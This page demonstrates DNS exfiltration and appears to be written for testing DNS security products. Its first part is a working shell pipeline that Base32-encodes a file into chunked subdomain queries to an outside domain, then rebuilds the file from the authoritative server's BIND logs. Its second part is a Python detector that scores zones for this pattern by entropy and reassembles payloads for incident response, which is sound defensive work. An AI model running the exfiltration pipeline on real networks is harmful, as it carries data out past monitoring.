DNS Exfiltration Demo
Simple Exfiltration
Note that the BIND logs will be approximately 17 times the size of the transferred file.
Note that this is actually two scripts: the last few commands are run on the authoritative DNS server to decode the file back out of its logs.
# File to be exfiltrated
SOURCE=/home/name/dns_exfil_test/file.pdf
# Working files: the Base32 query list built on the client, and the DNS server's copy rebuilt from its logs
ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
ENCRYPTED2=/home/name/dns_exfil_test/decryptedpdf.txt
# SLD of exfiltration domain
DOMAIN=ferrety-solutions.com
# Sub-domain off the SLD that we change for every file
SUBDOM=asdf
# Target DNS server (e.g. NIOS with DFP or BloxOne Host)
LOCALDNS=192.168.11.154
# Log file that the DNS queries can be found in on the authoritative DNS server
BIND_LOG_FILE=/var/log/named/query.log
# File to put the decoded, received file into (should be a replica of SOURCE)
DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
# Encode the source file as Base32 (this is encoding, not encryption),
# then split it into strings of 32 characters each,
# then suffix on the domain to query,
# then add the line number to the start of each line (i.e. put a sequence number on each query),
# then remove the whitespace at the start of each line,
# then replace the TAB between the number and the domain with a ".".
base32 "$SOURCE" | tr -d '\n' | fold -w 32 | sed "s/$/.$SUBDOM.$DOMAIN/" | nl | sed 's/^ *//' | sed 's/\t/./' > "$ENCRYPTED"
# The result is a file that contains a huge list of FQDNs for us to query (exfiltrate).
# Use dig to iterate over the file and resolve the names at full speed.
dig +short A @"$LOCALDNS" -f "$ENCRYPTED"
# OR, if you want to add a delay into the exfiltration, use the following line
# (the 1-second sleep is an example value; adjust to taste):
# for i in $(cat "$ENCRYPTED"); do dig +short A @"$LOCALDNS" "$i"; sleep 1; done
## The following commands get run on the authoritative DNS server.
# Parse the DNS server logs,
# then limit the scope to just the queries associated with the SUBDOM that we set (i.e. ignore all the other random stuff we get and any other exfiltration tasks running),
# then extract just the FQDN query itself (in this log format the name is whitespace-delimited field 8, wrapped as "(fqdn):"),
# then strip the "(" character,
# then strip the "):" characters,
# and put the output into ENCRYPTED2 (i.e. the DNS server's copy of the encoded file).
grep "$SUBDOM.$DOMAIN" "$BIND_LOG_FILE" | awk '{print $8}' | sed 's/(//g; s/)://g' > "$ENCRYPTED2"
# Take the ENCRYPTED2 file,
# then strip off the SUBDOM.DOMAIN suffix,
# then sort numerically by sequence number, as sometimes queries arrive in the wrong order (a plain lexical sort would put 10 before 2),
# then remove duplicate queries (BloxOne Threat Defense seems to duplicate stuff a bit),
# then drop the sequence number so only the Base32 chunk remains,
# then strip out the newline characters so we just have a bunch of Base32 text,
# then convert the Base32 back and recreate the original file.
sed "s/.$SUBDOM.$DOMAIN//g" "$ENCRYPTED2" | sort -n | uniq | cut -d. -f2 | tr -d '\n' | base32 --decode > "$DECRYPTEDOUTPUT"
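The detection and recovery side of this demo, as an added example that is not part of the original page or of the Infoblox tooling it mentions: it parses BIND query-log lines in the layout the awk '{print $8}' above expects, scores each zone for the chunked-payload signature the script produces (many queries, long labels drawn from the Base32 alphabet with high entropy, a numeric sequence prefix), and reassembles the payload for incident response, ordering chunks numerically and collapsing the duplicates the page mentions. The log lines, the zone exfil-demo.example, the plaintext and the thresholds are all constructed assumptions.

```python
"""Defender-side companion to the demo above: parse BIND query logs, score each
zone for the chunked-payload signature, and reassemble what was carried out.
All log lines, names and thresholds below are constructed for this example."""
import base64
import math
import re
from collections import defaultdict

# BIND 9 query-log line with print-time/category/severity on:
# "DATE TIME queries: info: client @0x.. IP#PORT (QNAME): query: QNAME IN TYPE FLAGS (SERVER)"
QUERY_RE = re.compile(r"\((?P<qname>[^)]+)\): query: \S+ IN (?P<qtype>\S+)")
BASE32_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=")

SUBDOM, ZONE = "asdf", "exfil-demo.example"          # placeholder zone, not the page's
SAMPLE_PLAINTEXT = (b"Quarterly results: revenue up 12 percent, headcount flat, "
                    b"budget for new DNS monitoring approved. Do not forward.")


def _log_line(n, qname, qtype):
    # Field 8 is "(qname):", the layout the page's awk '{print $8}' relies on.
    return (f"12-Jun-2023 10:15:{n % 60:02d}.000 queries: info: client @0x7f8a1c0b2a30 "
            f"192.168.11.20#{51000 + n} ({qname}): query: {qname} IN {qtype} + (192.168.11.154)")


def build_sample_log():
    """Three benign lookups plus one payload chunked exactly as the demo does:
    base32, fold to 32 chars, sequence number in front, SUBDOM.ZONE behind."""
    encoded = base64.b32encode(SAMPLE_PLAINTEXT).decode()
    chunks = [encoded[i:i + 32] for i in range(0, len(encoded), 32)]
    names = [("www.example.com", "A"), ("mail.example.com", "MX"), ("cdn.example.com", "A")]
    names += [(f"{seq}.{c}.{SUBDOM}.{ZONE}", "A") for seq, c in enumerate(chunks, 1)]
    names.append((f"2.{chunks[1]}.{SUBDOM}.{ZONE}", "A"))  # duplicated query, as the page notes
    return "\n".join(_log_line(i, q, t) for i, (q, t) in enumerate(names))


def parse_query_log(text):
    """Return (qname, qtype) for every line that matches the query-log shape."""
    found = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            found.append((m.group("qname").rstrip("."), m.group("qtype")))
    return found


def shannon_entropy(label):
    """Bits per character; a 32-char Base32 chunk scores far above a dictionary label."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label.upper():
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def zone_of(qname):
    # Assumption: the last two labels are the registrable zone the sender controls.
    return ".".join(qname.split(".")[-2:])


def score_zones(queries, min_queries=5, min_label_len=20, min_entropy=3.0):
    """Per zone: query volume, count of long high-entropy labels, Base32-alphabet
    check, numeric sequence prefixes, and an estimate of encoded characters carried."""
    by_zone = defaultdict(list)
    for qname, _ in queries:
        by_zone[zone_of(qname)].append(qname)
    report = {}
    for zone, names in by_zone.items():
        labels = [lab for n in names for lab in n.split(".")[:-2]]
        long_labels = [lab for lab in labels if len(lab) >= min_label_len]
        entropies = [shannon_entropy(lab) for lab in long_labels]
        mean_entropy = sum(entropies) / len(entropies) if entropies else 0.0
        report[zone] = {
            "queries": len(names),
            "long_labels": len(long_labels),
            "mean_entropy": round(mean_entropy, 2),
            "base32_alphabet": bool(long_labels) and all(set(lab.upper()) <= BASE32_CHARS for lab in long_labels),
            "sequence_prefix": sum(n.split(".")[0].isdigit() for n in names),
            "payload_chars": sum(len(lab) for lab in long_labels),
            "suspicious": len(long_labels) >= min_queries and mean_entropy >= min_entropy,
        }
    return report


def reassemble_payload(qnames, suffix):
    """Incident-response step: strip the suffix, order chunks numerically (a lexical
    sort puts 10 before 2), collapse duplicates, Base32-decode. None if not decodable."""
    chunks = {}
    for name in qnames:
        if not name.endswith("." + suffix):
            continue
        seq, _, chunk = name[:-len(suffix) - 1].partition(".")
        if seq.isdigit():
            chunks[int(seq)] = chunk          # same sequence number twice -> one chunk
    try:
        return base64.b32decode("".join(chunks[k] for k in sorted(chunks)), casefold=True)
    except ValueError:                       # binascii.Error is a ValueError subclass
        return None


if __name__ == "__main__":
    queries = parse_query_log(build_sample_log())
    for zone, facts in score_zones(queries).items():
        print(zone, facts)
        if facts["suspicious"]:
            carried = [q for q, _ in queries if zone_of(q) == zone]
            print("  recovered:", reassemble_payload(carried, f"{SUBDOM}.{ZONE}"))
```

The thresholds are starting points rather than tuned values: in a real deployment the same scoring would run continuously over the query log, baselined per client and per zone, and the reassembly step would only be used once a zone has been flagged, to establish what actually left. Note that ordering by the integer sequence number is what makes the duplicate-and-reorder case safe, which is the same reason the shell recovery step above sorts numerically rather than lexically.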
Last modified by bstafford
